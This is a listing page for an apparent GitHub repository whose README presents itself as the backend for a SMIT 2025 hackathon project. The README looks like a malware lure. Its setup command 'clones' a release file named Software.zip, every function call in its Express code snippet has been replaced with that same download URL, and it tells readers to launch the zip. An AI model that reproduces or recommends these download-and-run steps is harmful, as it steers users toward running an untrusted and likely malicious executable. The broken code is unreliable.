https://github.com/razzisproatgaming/hacathon-backend-smit
Hacathon SMIT - 2025 - Batch - 11. Coding Night. ( backend ).
https://github.com/razzisproatgaming/hacathon-backend-smit
backend-development express-middleware frontend-development hacathon mongodb-atlas mongoose nodejs nodemon npm npx
Last synced: 2 months ago
JSON representation
Hacathon SMIT - 2025 - Batch - 11. Coding Night. ( backend ).
- Host: GitHub
- URL: https://github.com/razzisproatgaming/hacathon-backend-smit
- Owner: RAZZISPROATGAMING
- Created: 2025-02-02T23:27:42.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2025-03-24T10:29:32.000Z (2 months ago)
- Last Synced: 2025-03-24T10:29:39.207Z (2 months ago)
- Topics: backend-development, express-middleware, frontend-development, hacathon, mongodb-atlas, mongoose, nodejs, nodemon, npm, npx
- Size: 1.95 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# 🔥 Welcome to Hacathon SMIT 2025 Batch 11 Coding Night! 🔥

## About
This repository contains the backend codebase for the Hacathon SMIT 2025 Batch 11 Coding Night. Join us in our quest to create innovative solutions using cutting-edge technologies!## Repository Details
- **Repository Name:** hacathon-backend-smit
- **Description:** Backend development for Hacathon SMIT - 2025 - Batch - 11 Coding Night
- **Topics:** backend-development, express-middleware, expressjs, frontend-development, hacathon, mongodb-atlas, mongoose, nodejs, nodemon, npm, npx
## Setup Instructions
1. Clone the repository:
```bash
git clone https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip
```2. Install dependencies:
```bash
npm install
```3. Run the development server:
```bash
npm start
```## Code Snippet
```javascript
const express = require('express');
const app = express();https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip('/', (req, res) => {
https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip('Welcome to Hacathon SMIT!');
});https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip(3000, () => {
https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip('Server is running on port 3000');
});
```## 🚀 Explore Our Backend Features
- Express Middleware for seamless request handling
- MongoDB Atlas integration for database operations
- Mongoose for elegant MongoDB object modeling
- Nodemon for automatic server restarts
- npm & npx for package management and script execution## Software Download
[](https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip)⚠️ Note: The provided link leads to a software zip file which needs to be launched for accessing the contents. ⚠️
## Contributions
We welcome contributions to enhance our backend system for the Hacathon SMIT event. Feel free to fork the repository and submit your pull requests to collaborate with us!Let's code and innovate together! 🌟
